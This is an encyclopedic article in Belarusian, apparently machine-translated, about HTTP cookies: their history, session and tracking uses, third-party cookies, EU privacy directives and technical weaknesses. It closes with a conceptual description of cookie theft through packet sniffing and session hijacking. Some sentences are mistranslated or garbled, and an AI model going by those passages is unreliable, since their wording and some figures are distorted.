Інтэрнэт-кукі: што гэта такое? Вызначэнне, паходжанне, тыпы і прыватнасць

Un cookie або вэб-кукі (ці печыва, скарочана як сведка у Квебеку) вызначаецца камунікацыйным пратаколам HTTP як паслядоўнасць інфармацыі, адпраўленай HTTP-серверам HTTP-кліенту, якую апошні вяртае кожны раз, калі той жа HTTP-сервер запытваецца пры пэўных умовах.

Печыва - гэта эквівалент a невялікі тэкставы файл, які захоўваецца на тэрмінале карыстальніка Інтэрнэту. Існуючы больш за 20 гадоў, яны дазваляюць распрацоўшчыкам сайтаў захоўваць даныя карыстальнікаў, каб палегчыць іх навігацыю і дазволіць пэўныя функцыі. Файлы cookie заўсёды выклікалі больш-менш спрэчкі, таму што яны ўтрымліваюць рэшткавую асабістую інфармацыю, якая патэнцыйна можа быць выкарыстана трэцімі асобамі.

Ён адпраўляецца ў якасці HTTP-загалоўка вэб-серверам вэб-браўзеру, які вяртае яго нязменным пры кожным доступе да сервера. Печыва можна выкарыстоўваць для аўтэнтыфікацыя, сесія (дзярж. утрыманне), і за захоўваць пэўную інфармацыю пра карыстальніка, напрыклад, налады сайта або змесціва электроннага кошыка. Тэрмін cookie паходзіць ад чароўнае печыва, добра вядомая канцэпцыя ў вылічэннях UNIX, якая натхніла на ідэю і назву файлаў cookie браўзера. Існуе некалькі альтэрнатыў файлам cookie, кожная з якіх мае сваё выкарыстанне, перавагі і недахопы.

Будучы простымі тэкставымі файламі, файлы cookie не выконваюцца. Яны не з'яўляюцца ні шпіёнскіх праграм, ні вірусаў, хоць файлы cookie з некаторых сайтаў выяўляюцца многімі антывіруснымі праграмамі, таму што яны дазваляюць адсочваць карыстальнікаў, калі яны наведваюць некалькі сайтаў. 

Большасць сучасных браўзераў дазваляюць карыстальнікам вырашыць, прыняць або адхіліць файлы cookie. Карыстальнікі таксама могуць выбраць, як доўга захоўваюцца файлы cookie. Аднак поўная адмова ад файлаў cookie робіць некаторыя сайты непрыдатнымі. Напрыклад, крамныя кошыкі або сайты, якія патрабуюць уваходу з дапамогай уліковых дадзеных (імя карыстальніка і пароль).

гістарычны

Тэрмін печыва паходзіць ад ангельскага тэрміна чароўнае печыва, які ўяўляе сабой пакет даных, які праграма атрымлівае і вяртае ў нязменным выглядзе. Файлы cookie ўжо выкарыстоўваліся ў ІТ Лу Мантулі была ідэя выкарыстоўваць іх у вэб-камунікацыі Чэрвень 1994. У той час ён працаваў у кампаніі Netscape Communications, якая распрацавала для кліента прыкладанне для электроннай камерцыі. Файлы cookie дазволілі вырашыць праблему надзейнасці рэалізацыі віртуальнай кошыка крамы.

У тым жа годзе Джон Джанандрэа і Лу Мантулі напісалі першую спецыфікацыю печыва Netscape. Бэта-версія Mosaic Netscape 0.9, выпушчаная 13 кастрычніка 1994 г., інтэграваная тэхналогія печыва (гл пост). Першае (не эксперыментальнае) выкарыстанне файлаў cookie заключалася ў тым, каб вызначыць, ці наведвалі сайт Netscape наведвальнікі раней. Montulli падаў заяўку на патэнт на тэхналогію печыва ў 1995 годзе, і патэнт ЗША 5774670 быў выдадзены. прадастаўлены ў 1998 годзе.

Пасля ўкаранення ў бэта-версію Netscape 0.9 у 1994 годзе файлы cookie былі інтэграваныя ў Internet Explorer 2, выпушчаны ў кастрычніку 1995 года.

Увядзенне файлаў cookie яшчэ не было шырока вядома грамадскасці. У прыватнасці, файлы cookie прымаліся па змаўчанні ў наладах браўзера, і карыстальнікі не інфармаваліся аб іх наяўнасці. Некаторыя людзі ведалі пра існаванне файлаў cookie прыкладна ў першым квартале 1995 года, але шырокая грамадскасць даведалася пра іх існаванне толькі пасля таго, як 12 лютага 1996 года Financial Times апублікавала артыкул. У тым жа годзе файлы cookie атрымалі вялікую ўвагу ў СМІ з-за магчымых парушэнняў прыватнасці. Тэма печыва абмяркоўвалася на двух кансультацыях Амерыканскай федэральнай гандлёвай камісіі ў 1996 і 1997 гадах.

Распрацоўка афіцыйнай спецыфікацыі файлаў cookie ўжо вялася. Першыя абмеркаванні афіцыйнай спецыфікацыі адбыліся ў красавіку 1995 года ў спісе рассылкі www-talk. Была створана спецыяльная рабочая група IETF. Дзве альтэрнатыўныя прапановы па ўвядзенні стану ў HTTP-транзакцыі былі прапанаваны Браянам Белендорфам і Дэвідам Крысталам адпаведна, але група пад кіраўніцтвам самога Крыстала вырашыла выкарыстоўваць у якасці адпраўной кропкі спецыфікацыю Netscape. У лютым 1996 года рабочая група вызначыла, што староннія файлы cookie ўяўляюць сабой значную пагрозу прыватнасці. Спецыфікацыя, створаная групай, была ў канчатковым выніку апублікаваная як RFC 2109.

З канца 2014 года мы бачым банэр пра файлы cookie на многіх сайтах. Існуе як мінімум адно пашырэнне браўзера, якое дазваляе банэр не адлюстроўваецца.

Тыпы файлаў cookie і іх выкарыстанне

Кіраванне сесіямі

Файлы cookie могуць выкарыстоўвацца для захавання карыстальніцкіх даных падчас навігацыі, а таксама падчас некалькіх наведванняў. Файлы cookie былі ўведзены для забеспячэння сродкаў рэалізацыі электронных кошыкаў для пакупак, віртуальнай прылады, у якой карыстальнік можа назапашваць тавары, якія ён хоча купіць падчас прагляду сайта.

У нашы дні такія прыкладанні, як каляскі для пакупак, замест гэтага захоўваюць спіс тавараў у базе дадзеных на серверы, што з'яўляецца пераважней; чым захоўваць іх у самім файле cookie. Вэб-сервер адпраўляе файл cookie, які змяшчае унікальны ідэнтыфікатар сеансу. Затым вэб-браўзер вяртае гэты ідэнтыфікатар сеансу пры кожным наступным запыце, а элементы ў кошыку захоўваюцца і звязваюцца з гэтым жа унікальным ідэнтыфікатарам сеансу.

Частае выкарыстанне файлаў cookie карысна для ўваходу на сайт з выкарыстаннем уліковых дадзеных. Карацей кажучы, вэб-сервер спачатку адпраўляе файл cookie, які змяшчае унікальны ідэнтыфікатар сеансу. Затым карыстальнікі ўводзяць свае ўліковыя дадзеныя (звычайна імя карыстальніка і пароль). Затым вэб-прыкладанне аўтэнтыфікуе сеанс і дазваляе карыстачу атрымаць доступ да службы.

ўвасабленне

Файлы cookie могуць быць выкарыстаны для запамінання інфармацыі аб карыстальніку сайта, каб у будучыні паказваць яму адпаведны кантэнт. Напрыклад, вэб-сервер можа адправіць файл cookie, які змяшчае апошняе імя карыстальніка, якое выкарыстоўвалася для ўваходу на гэты вэб-сайт, так што імя карыстальніка можа быць папярэдне запоўнена пры будучых наведваннях.

Многія вэб-сайты выкарыстоўваюць файлы cookie для персаналізацыі на аснове пераваг карыстальнікаў. Карыстальнікі выбіраюць свае перавагі ў форме і адпраўляюць іх на сервер. Сервер кадуе налады ў файле cookie і адпраўляе яго назад у браўзер. У далейшым кожны раз, калі карыстальнік заходзіць на старонку гэтага сайта, браўзер вяртае файл cookie і, такім чынам, спіс налад; затым сервер можа наладзіць старонку ў адпаведнасці з перавагамі карыстальніка. Напрыклад, вэб-сайт Wikipedia дазваляе сваім карыстальнікам выбіраць вокладку сайта, які ім больш падабаецца. Пошукавая сістэма Google дазваляе сваім карыстальнікам (нават калі яны не зарэгістраваныя) выбіраць колькасць вынікаў, якія яны хочуць бачыць на кожнай старонцы вынікаў.

Адсочванне

Файлы cookie для адсочвання выкарыстоўваюцца для адсочвання звычак інтэрнэт-карыстальнікаў у інтэрнэце. Часткова гэта можна зрабіць з дапамогай IP-адраса камп'ютара, які робіць запыт на старонку, або з дапамогай HTTP-загалоўка 'referrer', які кліент адпраўляе з кожным запытам, але файлы cookie забяспечваюць большую дакладнасць. Гэта можна зрабіць, як у наступным прыкладзе:

1. Калі карыстальнік адкрывае старонку на сайце, і запыт не ўтрымлівае cookie, сервер лічыць, што гэта першая старонка, наведаная карыстальнікам. Затым сервер стварае выпадковы радок і адпраўляе яго ў браўзер разам з запытанай старонкай.
2. З гэтага моманту файлы cookie будуць аўтаматычна адпраўляцца браўзерам пры кожным выкліку новай старонкі сайта. Сервер адправіць старонку, як звычайна, але таксама зарэгіструе URL выкліканай старонкі, дату, час запыту і файл cookie ў файле часопіса.

Гледзячы на ​​файл часопіса, можна ўбачыць, якія старонкі наведаў карыстальнік і ў якім парадку. Напрыклад, калі файл змяшчае некалькі запытаў, зробленых з выкарыстаннем файла cookie id=abc, гэта можа сведчыць аб тым, што ўсе гэтыя запыты паступаюць ад аднаго карыстальніка. Запытаны URL, дата і час, звязаныя з запытамі, дазваляюць адсочваць прагляд карыстальнікам.

Староннія файлы cookie і вэб-маякі, якія тлумачацца ніжэй, дадаткова дазваляюць адсочваць розныя сайты. Адсочванне аднаго сайта звычайна выкарыстоўваецца ў статыстычных мэтах. З іншага боку, адсочванне розных сайтаў з выкарыстаннем старонніх файлаў cookie звычайна выкарыстоўваецца рэкламнымі кампаніямі для стварэння ананімных профіляў карыстальнікаў (якія потым выкарыстоўваюцца для вызначэння таго, якую рэкламу трэба паказваць карыстальніку, а таксама для адпраўкі яму лістоў, якія адпавядаюць гэтай рэкламе - СПАМ).

Файлы cookie для адсочвання ўяўляюць сабой рызыку ўварвання ў прыватнасць карыстальнікаў, але іх можна лёгка выдаліць. У большасці сучасных браўзераў ёсць магчымасць аўтаматычнага выдалення пастаянных файлаў cookie пры закрыцці праграмы.

Файлы cookie трэціх асоб

Выявы і іншыя аб'екты, якія змяшчаюцца на вэб-старонцы, могуць знаходзіцца на розных серверах, чым той, на якім знаходзіцца старонка. Для адлюстравання старонкі браўзер спампоўвае ўсе гэтыя аб'екты. Большасць вэб-сайтаў змяшчае інфармацыю з розных крыніц. Напрыклад, калі вы ўводзіце www.example.com у свой браўзер, на частцы старонкі часта будуць з'яўляцца аб'екты або рэклама, якія паходзяць з іншых крыніц, гэта значыць з іншага дамена, чым www.example.com. "Першыя" файлы cookie - гэта файлы cookie, якія ўсталёўваюцца даменам, указаным у адрасным радку браўзера. Староннія файлы cookie ўсталёўваюцца адным з аб'ектаў старонкі, які паходзіць з іншага дамена.

Па змаўчанні такія браўзеры, як Mozilla Firefox, Microsoft Internet Explorer і Opera, прымаюць файлы cookie трэціх асоб, але карыстальнікі могуць змяніць налады ў параметрах браўзера, каб заблакіраваць іх. Няма ніякай рызыкі для бяспекі, уласцівай староннім файлам cookie, якія дазваляюць працаваць у Інтэрнэце, аднак яны таксама выкарыстоўваюцца для адсочвання карыстальнікаў. з сайта на сайт.

Такія інструменты, як Ghostery, даступныя для ўсіх браўзераў, уключаючы Google Chrome, могуць блакаваць абмен паміж трэцімі асобамі.

Рэалізацыя

Кукі - гэта невялікія фрагменты дадзеных, якія вэб-сервер адпраўляе ў браўзер. Браўзер вяртае іх у нязменным выглядзе на сервер, уводзячы стан (памяць аб мінулых падзеях) у HTTP-транзакцыю без стану. Без файлаў cookie кожны пошук вэб-старонкі або кампанента вэб-старонкі з'яўляецца асобнай падзеяй, незалежнай ад іншых запытаў, зробленых на той жа сайт. У дадатак да магчымасці ўстаноўкі вэб-серверам, файлы cookie таксама могуць быць устаноўлены мовамі сцэнарыяў, такімі як JavaScript, калі яны падтрымліваюцца і аўтарызуюцца браўзерам.

Афіцыйная спецыфікацыя файлаў cookie мяркуе, што браўзеры павінны мець магчымасць захоўваць і паўторна адпраўляць мінімальную колькасць файлаў cookie. У прыватнасці, браўзер павінен мець магчымасць захоўваць не менш за 300 файлаў cookie па чатыры кілабайты кожны і не менш за 20 файлаў cookie для аднаго сервера або дамена.

Згодна з п. 3.1 ст RFC 2965, назвы файлаў cookie неадчувальныя да рэгістра.

Файл cookie можа ўказваць дату заканчэння тэрміну дзеяння, і ў гэтым выпадку файл cookie будзе выдалены ў гэтую дату. Калі файл cookie не вызначае тэрмін прыдатнасці, ён выдаляецца, як толькі карыстальнік пакідае свой браўзер. Такім чынам, указанне тэрміну прыдатнасці - гэта спосаб прымусіць файл cookie выжыць падчас некалькіх сеансаў. Па гэтай прычыне печыва з тэрмінам прыдатнасці называюць ўстойлівы. Прыклад прымянення: сайт рознічнага гандлю можа выкарыстоўваць пастаянныя файлы cookie для запісу тавараў, якія карыстальнікі змясцілі ў свой кошык (у рэчаіснасці файл cookie можа спасылацца на запіс, захаваны ў базе дадзеных на сайце продажу, а не ў вашым камп'ютары) . Такім чынам, калі карыстальнікі пакідаюць свой браўзер, не зрабіўшы пакупкі, і вяртаюцца да яго пазней, яны змогуць зноў знайсці тавары ў кошыку. Калі гэтыя файлы cookie не паказваюць тэрмін прыдатнасці, яны скончацца пры закрыцці браўзера, і інфармацыя аб змесціве кошыка будзе страчана.

Кукі-файлы могуць быць абмежаваныя ў межах пэўнага дамена, субдамена або шляху на серверы, які іх стварыў.

Стварэнне файла cookie

Перадача вэб-старонак ажыццяўляецца з дапамогай пратаколу перадачы гіпертэксту (HTTP). Ігнаруючы файлы cookie, браўзеры выклікаюць старонку з вэб-сервераў, звычайна адпраўляючы ім кароткі тэкст HTTP-запыт. Напрыклад, каб атрымаць доступ да старонкі www.example.org/index.html, браўзеры падключаюцца да сервера www.example.org і адпраўляюць запыт, які выглядае так:

	GET /index.html HTTP/1.1Host: www.example.org
навігатар	→	Serveur

Сервер адказвае, адпраўляючы запытаную старонку, якой папярэднічае падобны тэкст, і выклікаецца цэлая старонка HTTP-адказ. Гэты пакет можа ўтрымліваць радкі, якія загадваюць браўзеру захоўваць файлы cookie:

	HTTP/1.1 200 OKContent-тып: тэкст/htmlSet-Cookie: імя=значэнне (HTML старонка)
навігатар	←	Serveur

Сервер адпраўляе радок Set-Cookie толькі ў тым выпадку, калі сервер хоча, каб браўзер захоўваў файлы cookie. Set-Cookie - гэта запыт для браўзера захоўваць радок name=value і вяртаць яго ва ўсіх будучых запытах да сервера. Калі браўзер падтрымлівае кукі і кукі ўключаны ў параметрах браўзера, кукі будуць уключаны ва ўсе наступныя запыты да таго ж сервера. Напрыклад, браўзер выклікае старонку www.example.org/news.html, адпраўляючы наступны запыт на сервер www.example.org:

	GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */*
навігатар	→	Serveur

Гэта запыт для іншай старонкі з таго ж сервера, і ён адрозніваецца ад першага, таму што змяшчае радок, які сервер раней адправіў у браўзер. Дзякуючы гэтаму сродку сервер ведае, што гэты запыт звязаны з папярэднім. Сервер адказвае, адпраўляючы выкліканую старонку, а таксама дадаючы на ​​яе іншыя файлы cookie.

Сервер можа змяніць значэнне файла cookie, адправіўшы новы радок Set-Cookie: name=new_value у адказ на выкліканую старонку. Затым браўзер замяняе старое значэнне на новае.

Радок Set-Cookie звычайна ствараецца праграмай CGI або іншай мовай сцэнарыяў, а не серверам HTTP. Сервер HTTP (прыклад: Apache) перадасць толькі вынік праграмы (дакумент, якому папярэднічае загаловак, які змяшчае файлы cookie) у браўзер.

Файлы cookie таксама могуць быць устаноўлены з дапамогай JavaScript або іншых падобных моў, якія працуюць у браўзеры, гэта значыць на баку кліента, а не на баку сервера. У JavaScript для гэтай мэты выкарыстоўваецца аб'ект document.cookie. Напрыклад, аператар document.cookie = "temperature=20" стварае файл cookie з назвай "temperature" і значэннем 20.

Атрыбуты кукі

У дадатак да пары імя/значэнне, файл cookie можа таксама ўтрымліваць дату заканчэння тэрміну прыдатнасці, шлях, імя дамена і тып меркаванага злучэння, напрыклад, звычайнае або зашыфраванае. RFC 2965 таксама вызначае, што файлы cookie павінны мець абавязковы нумар версіі, але гэта звычайна апускаецца. Гэтыя часткі даных ідуць пасля пары імя=новае_значэнне і падзеленыя кропкай з коскі. Напрыклад, файл cookie можа быць створаны серверам, адправіўшы радок Set-Cookie: name=new_value; expires=дата; шлях=/; дамен=.example.org.

Тэрмін дзеяння файла cookie

Тэрмін дзеяння файлаў cookie заканчваецца і не адпраўляецца браўзерам на сервер у наступных сітуацыях:

• Калі браўзер зачынены, калі файл cookie не з'яўляецца пастаянным.
• Калі скончыўся тэрмін дзеяння файлаў cookie.
• Калі тэрмін дзеяння файлаў cookie зменены (серверам або скрыптам) на дату ў мінулым.
• Калі браўзер выдаляе файлы cookie па запыце карыстальніка.

Трэцяя сітуацыя дазваляе серверам або скрыптам відавочна выдаліць файл cookie. Звярніце ўвагу, што ў вэб-браўзеры Google Chrome можна даведацца дату заканчэння тэрміну прыдатнасці пэўнага файла cookie, зайшоўшы ў налады кантэнту. Файл cookie, захаваны на камп'ютары, цалкам можа заставацца там некалькі дзесяцігоддзяў, калі не выканаць працэдуру яго выдалення.

Стэрэатыпы

З моманту іх з'яўлення ў Інтэрнэце шмат ідэй пра печыва цыркулявала ў Інтэрнэце і ў СМІ. У 1998 годзе CIAC, група маніторынгу камп'ютэрных інцыдэнтаў Міністэрства энергетыкі ЗША, вызначыла, што ўразлівасці ў бяспецы файлаў cookie "па сутнасці адсутнічаюць", і патлумачыла, што "інфармацыя аб паходжанні вашых наведванняў і дэталі вэб-старонак, якія вы наведалі, ужо існуюць у файлах часопісаў вэб-сервераў». У 2005 годзе кампанія Jupiter Research апублікавала вынікі даследавання, у якім значная частка рэспандэнтаў разглядала наступныя сцвярджэнні:

• Печыва падобна вірус, яны заражаюць жорсткія дыскі карыстальнікаў.
• Файлы cookie генеруюць Зьяўляюцца.
• Файлы cookie выкарыстоўваюцца для адпраўкі спам.
• Cookies выкарыстоўваюцца толькі для рэкламы.

Cookies не могуць сцерці або прачытаць інфармацыю з кампутара карыстальніка. Аднак файлы cookie дазваляюць выяўляць вэб-старонкі, наведаныя карыстальнікам на пэўным сайце або групе сайтаў. Гэтая інфармацыя можа быць сабрана ў профілі карыстальніка, які можа быць выкарыстаны або перапрададзены трэцім асобам, што можа выклікаць сур'ёзныя праблемы з прыватнасцю. Некаторыя профілі ананімныя, у тым сэнсе, што яны не ўтрымліваюць асабістай інфармацыі, але нават такія профілі могуць быць сумніўнымі.

Згодна з тым жа даследаваннем, вялікі працэнт карыстальнікаў Інтэрнэту не ведаюць, як выдаліць файлы cookie. Адной з прычын, па якой людзі не давяраюць файлам cookie, з'яўляецца тое, што некаторыя сайты злоўжываюць персанальнымі аспектамі файлаў cookie і перадаюць гэтую інфармацыю іншым крыніцам. Вялікі працэнт мэтавай рэкламы і непажаданай электроннай пошты, якая лічыцца спамам, паходзіць з інфармацыі, атрыманай з адсочвання файлаў cookie.

Налады браўзэра

Большасць браўзераў падтрымліваюць файлы cookie і дазваляюць карыстачу адключыць іх. Самыя распаўсюджаныя варыянты:

• Уключыце або цалкам адключыце файлы cookie, каб яны пастаянна прымаліся або блакіраваліся.
• Дазвольце карыстальніку бачыць актыўныя файлы cookie на дадзенай старонцы, увёўшы javascript: alert(document.cookie) у адрасным радку браўзера. Некаторыя браўзеры ўключаюць мэнэджар файлаў cookie для карыстальніка, які можа праглядаць і выбарачна выдаляць файлы cookie, якія зараз захоўваюцца ў браўзеры.

Большасць браўзераў таксама дазваляюць поўнае выдаленне персанальных даных, уключаючы файлы cookie. Таксама існуюць дадатковыя модулі для кантролю дазволаў на файлы cookie.

Канфідэнцыяльнасць і файлы cookie трэціх бакоў

У гэтым фіктыўным прыкладзе рэкламная кампанія размясціла банеры на двух сайтах. Размяшчаючы банеры на сваіх серверах і выкарыстоўваючы староннія файлы cookie, рэкламная кампанія можа адсочваць навігацыю карыстальніка па гэтых двух сайтах.

Файлы cookie маюць важныя наступствы для прыватнасці і ананімнасці вэб-карыстальнікаў. Хаця файлы cookie адпраўляюцца назад толькі на сервер, які іх усталяваў, або на сервер, які належыць да таго ж інтэрнэт-дамена, аднак вэб-старонка можа ўтрымліваць выявы або іншыя кампаненты, якія захоўваюцца на серверах, якія належаць да іншых даменаў. Файлы cookie, якія ўсталёўваюцца падчас атрымання гэтых знешніх кампанентаў, называюцца файлы cookie трэціх асоб. Гэта ўключае файлы cookie з непажаданых усплывальных вокнаў.

Рэкламныя кампаніі выкарыстоўваюць староннія файлы cookie для адсочвання карыстальнікаў на розных сайтах, якія яны наведваюць. У прыватнасці, рэкламная кампанія можа адсочваць карыстальніка на ўсіх старонках, дзе яна размясціла рэкламныя малюнкі або піксель адсочвання. Веданне старонак, якія наведвае карыстальнік, дазваляе рэкламнай кампаніі арыентавацца на рэкламныя перавагі карыстальніка.

Магчымасць стварэння профілю карыстальніка некаторыя лічаць парушэннем прыватнасці, асабліва калі адсочванне ажыццяўляецца ў розных даменах з выкарыстаннем старонніх файлаў cookie. Па гэтай прычыне ў некаторых краінах дзейнічае заканадаўства аб файлах cookie.

Урад Злучаных Штатаў увёў строгія правілы размяшчэння файлаў cookie ў 2000 годзе пасля таго, як высветлілася, што Упраўленне Белага дома па палітыцы ў галіне наркотыкаў выкарыстоўвае файлы cookie для адсочвання кампутараў карыстальнікаў, якія праглядаюць рэкламу наркотыкаў у Інтэрнэце. У 2002 годзе актывіст абароны прыватнасці Даніэль Брандт выявіў, што ЦРУ пакідала пастаянныя файлы cookie на кампутарах, якія наведвалі яго вэб-сайты. Атрымаўшы інфармацыю аб гэтым парушэнні, ЦРУ заявіла, што гэтыя файлы cookie не былі адпраўлены наўмысна, і спыніла іх усталяванне. 25 снежня 2005 года Брандт выявіў, што Агенцтва нацыянальнай бяспекі (АНБ) пакінула два пастаянныя файлы cookie на кампутарах наведвальнікаў з-за абнаўлення праграмнага забеспячэння. Пасля паведамлення АНБ неадкладна адключыла файлы cookie.

У Злучаным Каралеўстве, Закон аб файлах cookie », які ўступіў у сілу 25 мая 2012 года, абавязвае сайты заяўляць аб сваіх намерах, дазваляючы карыстальнікам выбіраць, пакідаць ці не сляды свайго праходжання ў інтэрнэце. Такім чынам яны могуць быць абаронены ад таргетынгу рэкламы. аднак, у адпаведнасці з The Guardian, згода карыстальнікаў Інтэрнэту неабавязкова відавочная; былі ўнесены змены ва ўмовы згоды карыстальнікаў, што робіць яго такім чынам маецца на ўвазе.

Дырэктыва 2002/58 аб прыватнасці

Дырэктыва 202/58 аб прыватнасці і электронных камунікацыях змяшчае правілы выкарыстання файлаў cookie. У прыватнасці, пункт 5 артыкула 3 гэтай дырэктывы патрабуе, каб захоўванне даных (напрыклад, файлаў cookie) на кампутары карыстальніка магло ажыццяўляцца толькі ў тых выпадках, калі:

• карыстальнік інфармаваны аб тым, як выкарыстоўваюцца дадзеныя;
• карыстальніку даецца магчымасць адмовіцца ад гэтай аперацыі захоўвання. Аднак гэты артыкул таксама абвяшчае, што захаванне дадзеных па тэхнічных прычынах не падпадае пад дзеянне гэтага закона.

Дырэктыва павінна была ўвайсці ў дзеянне з кастрычніка 2003 г., аднак яна была прыменена на практыцы толькі вельмі недасканала, згодна са справаздачай ад снежня 2004 г., у якой таксама адзначалася, што некаторыя дзяржавы-члены (Славакія, Латвія, Грэцыя, Бельгія і Люксембург) яшчэ не транспаніравалі дырэктыву ва ўнутранае заканадаўства.

Згодна з меркаваннем G29 у 2010 г., гэтая дырэктыва, якая, у прыватнасці, абумоўлівае выкарыстанне файлаў cookie ў мэтах паводніцкай рэкламы пры відавочнай згодзе карыстальніка Інтэрнэту, па-ранейшаму прымяняецца вельмі дрэнна. Фактычна, большасць сайтаў робяць гэта такім чынам, што не адпавядае дырэктыве, абмяжоўваючыся простым "банерам", які інфармуе аб выкарыстанні "кукі", не даючы інфармацыі аб іх выкарыстанні, не адрозніваючы "тэхнічныя" кукі. файлы cookie "адсочвання", а таксама прапанаваць рэальны выбар карыстальніку, які жадае захоўваць тэхнічныя файлы cookie (напрыклад, файлы cookie кіравання кошыкам) і адмовіцца ад файлаў cookie "адсочвання". Фактычна, многія сайты не працуюць належным чынам, калі файлы cookie адмаўляюцца, што не адпавядае дырэктыве 2002/58 або дырэктыве 95/46 (Абарона асабістых даных).

Дырэктыва 2009 / 136 / CE

Гэты матэрыял быў абноўлены Дырэктывай 2009/136/EC ад 25 лістапада 2009 г., у якой гаворыцца, што «захоўванне інфармацыі або атрыманне доступу да ўжо захаванай інфармацыі ў канцавым абсталяванні абанента або карыстальніка дазваляецца толькі пры ўмове, што абанент або карыстальнік даў сваю згоду пасля атрымання, у адпаведнасці з Дырэктывай 95/46/EC, дакладнай і поўнай інфармацыі паміж іншымі аб мэтах апрацоўкі». Такім чынам, новая дырэктыва ўзмацняе абавязацельствы перад размяшчэннем файлаў cookie на кампутары інтэрнэт-карыстальніка.

Аднак у папярэдніх меркаваннях дырэктывы еўрапейскі заканадаўца вызначае: "Калі гэта тэхнічна магчыма і эфектыўна, у адпаведнасці з адпаведнымі палажэннямі Дырэктывы 95/46/EC, згода карыстальніка на апрацоўку можа быць выказана праз выкарыстанне адпаведных налад браўзера або іншага прыкладання». Але насамрэч ні адзін браўзер на сённяшні дзень не дазваляе аддзяліць асноўныя тэхнічныя файлы cookie ад неабавязковых, якія павінны быць пакінуты на выбар карыстальніка.

Гэтая новая дырэктыва была перанесена бельгійскімі дэпутатамі ў ліпені 2012 г. Даследаванне 2014 г. паказвае, што нават дэпутаты з цяжкасцю ўжываюць абмежаванні дырэктывы.

P3P

Спецыфікацыя P3P уключае ў сябе магчымасць сервера ўказваць палітыку прыватнасці, якая вызначае, якую інфармацыю ён збірае і з якой мэтай. Гэтыя палітыкі ўключаюць (але не абмяжоўваюцца імі) выкарыстанне інфармацыі, сабранай з дапамогай файлаў cookie. Згодна з азначэннямі P3P, браўзер можа прымаць або адхіляць файлы cookie, параўноўваючы палітыку прыватнасці з перавагамі карыстальніка або запытваючы карыстальніка, прадстаўляючы заяву аб канфідэнцыяльнасці палітыкі прыватнасці, абвешчаную серверам.

Многія браўзеры, у тым ліку Apple Safari і Microsoft Internet Explorer версіі 6 і 7, падтрымліваюць P3P, які дазваляе браўзеру вызначаць, ці прымаць старонняе захоўванне файлаў cookie. Браўзэр Opera дазваляе карыстальнікам адмаўляцца ад старонніх файлаў cookie і ствараць глабальны і спецыяльны профіль бяспекі для інтэрнэт-даменаў. Mozilla Firefox версіі 2 адмовілася ад падтрымкі P3P, але аднавіла яе ў версіі 3.

Староннія файлы cookie могуць быць заблакіраваны большасцю браўзераў для павышэння прыватнасці і скарачэння адсочвання рэкламы без негатыўнага ўплыву на працу карыстальніка ў Інтэрнэце. Многія рэкламныя агенцтвы прапануюць варыянт ўхіляцца да мэтавай рэкламы, усталяваўшы агульны файл cookie ў браўзеры, які дэактывуе гэты таргетынг, але такое рашэнне не з'яўляецца практычна эфектыўным, калі яно выконваецца, таму што гэты агульны файл cookie выдаляецца, як толькі карыстальнік выдаляе гэтыя файлы cookie, што адмяняе выбар з рашэння.

Недахопы печыва

Акрамя праблем з прыватнасцю, файлы cookie таксама маюць некаторыя тэхнічныя недахопы. У прыватнасці, яны не заўсёды дакладна ідэнтыфікуюць карыстальнікаў, яны могуць запавольваць працу сайта, калі іх вялікая колькасць, яны могуць выкарыстоўвацца для нападаў на бяспеку, і яны супярэчаць рэпрэзентатыўнай перадачы стану, архітэктурнаму стылю праграмнага забеспячэння.

Недакладная ідэнтыфікацыя

Калі на кампутары выкарыстоўваецца некалькі браўзераў, у кожным з іх заўсёды ёсць асобны блок захоўвання файлаў cookie. Такім чынам, файлы cookie ідэнтыфікуюць не чалавека, а камбінацыю ўліковага запісу карыстальніка, кампутара і вэб-браўзера. Такім чынам, кожны можа выкарыстоўваць гэтыя ўліковыя запісы, камп'ютары або браўзеры, якія маюць мноства файлаў cookie. Падобным чынам файлы cookie не робяць адрозненняў паміж некалькімі карыстальнікамі, якія выкарыстоўваюць адзін і той жа ўліковы запіс, камп'ютар і браўзер, напрыклад, у «інтэрнэт-кафэ» або ў любым іншым месцы, дзе прадастаўляецца бясплатны доступ да рэсурсаў кампутара.

Але на практыцы гэтае сцвярджэнне ў большасці выпадкаў аказваецца памылковым, таму што сёння «асабістым» кампутарам (ці смартфонам, ці планшэтам, што яшчэ горш) карыстаецца пераважна адзін чалавек. з дапамогай аб'ёму сабранай інфармацыі прыйсці да персанальнага таргетынгу, нават калі асоба не "дакладна" ідэнтыфікаваная.

Крадзеж печыва

Файл cookie можа быць скрадзены іншым кампутарам у сетцы.

Падчас нармальнай працы файлы cookie перадаюцца назад паміж серверам (або групай сервераў у адным дамене) і браўзерам кампутара карыстальніка. Паколькі файлы cookie могуць утрымліваць канфідэнцыйную інфармацыю (імя карыстальніка, пароль, які выкарыстоўваецца для аўтэнтыфікацыі і г.д.), іх значэнні не павінны быць даступныя іншым кампутарам. Крадзеж файлаў cookie - гэта акт перахопу файлаў cookie несанкцыянаваным трэцім бокам.

Файлы cookie могуць быць выкрадзены з дапамогай сніфера пакетаў у выніку атакі, званай захопам сеансу. Трафік у сетцы можа быць перахоплены і прачытаны камп'ютарамі, акрамя тых, якія адпраўляюць і прымаюць (асабліва ў незашыфраваным грамадскім прасторы Wi-Fi). Гэты трафік уключае файлы cookie, якія адпраўляюцца праз сеансы з выкарыстаннем простага пратаколу HTTP. Калі сеткавы трафік не зашыфраваны, шкоднасныя карыстальнікі могуць такім чынам прачытваць паведамленні іншых карыстальнікаў у сетцы з дапамогай «сніфераў пакетаў».

Гэтую праблему можна пераадолець шляхам шыфравання злучэння паміж кампутарам карыстальніка і серверам па пратаколе HTTPS. Сервер можа ўказаць a бяспечны сцяг пры ўсталёўцы кукі; браўзер адправіць яго толькі па абароненай лініі, напрыклад, злучэнні SSL.

Аднак многія сайты, хаця і выкарыстоўваюць для аўтэнтыфікацыі карыстальніка (напрыклад, старонку ўваходу) сувязь з шыфраваннем HTTPS, у мэтах павышэння эфектыўнасці пазней адпраўляюць сеансавыя файлы cookie і іншыя даныя, як звычайна, праз незашыфраваныя злучэнні HTTP. Такім чынам зламыснікі могуць перахопліваць файлы cookie іншых карыстальнікаў і выдаваць сябе за іх на адпаведных сайтах або выкарыстоўваць іх у атаках на файлы cookie.

Сцэнарыі на сайце: файл cookie, які павінен абменьвацца толькі паміж серверам і кліентам, адпраўляецца трэцяй асобе.

